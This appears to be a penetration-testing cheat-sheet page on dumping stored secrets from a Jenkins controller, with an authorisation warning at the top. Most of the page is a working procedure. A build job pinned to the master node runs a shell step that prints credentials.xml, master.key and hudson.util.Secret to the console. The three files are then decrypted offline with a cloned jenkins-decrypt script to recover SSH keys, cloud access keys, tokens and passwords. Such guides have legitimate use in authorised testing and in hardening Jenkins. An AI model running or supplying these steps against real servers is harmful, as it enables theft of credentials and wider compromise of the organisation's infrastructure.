Jenkins Exploit#

Post-authentication credential dumping on a Jenkins controller. Premise: the operator has a Jenkins account with permission to create or modify a build job on the master node. That alone is enough to read every secret the controller stores; the on-disk encryption can be unwound offline once the operator has the key file and the encrypted blob.

Warning

Jenkins build privileges are sensitive. Use only against targets the operator owns or has written authorisation to test.

Storage layout#

Jenkins keeps its secrets under $JENKINS_HOME:

  • $JENKINS_HOME/credentials.xml — encrypted credential entries.

  • $JENKINS_HOME/secrets/master.key — the master key.

  • $JENKINS_HOME/secrets/hudson.util.Secret — the encrypted key used by hudson.util.Secret.

The decryption chain combines all three. Getting any one without the others is useless; getting all three is total.

On the wire#

The operator triggers a Freestyle job pinned to the master node and runs a shell step that prints the three files.

New Item ▸ Freestyle project
  Configure ▸ Restrict where this project can be run ▸ master
  Build ▸ Add build step ▸ Execute shell

In the shell box:

echo "=== credentials.xml ==="
cat "${JENKINS_HOME}/credentials.xml"

echo "=== master.key (base64) ==="
base64 -w 0 "${JENKINS_HOME}/secrets/master.key"

echo "=== hudson.util.Secret (base64) ==="
base64 -w 0 "${JENKINS_HOME}/secrets/hudson.util.Secret"

Save the job, click Build Now, and pull the three blobs out of Console Output.

Decrypt offline#

Reconstitute the binary blobs locally and run the standard jenkins-decrypt helper.

$ echo '<base64 master.key>'        | base64 -d > master.key
$ echo '<base64 hudson.util.Secret>'| base64 -d > hudson.util.Secret
$ git clone https://github.com/tweksteen/jenkins-decrypt
$ python3 jenkins-decrypt/decrypt.py master.key hudson.util.Secret credentials.xml

The decoded output lists every stored credential the controller held: SSH keys, AWS access keys, GitHub tokens, plain username / password pairs, and the rest.

References#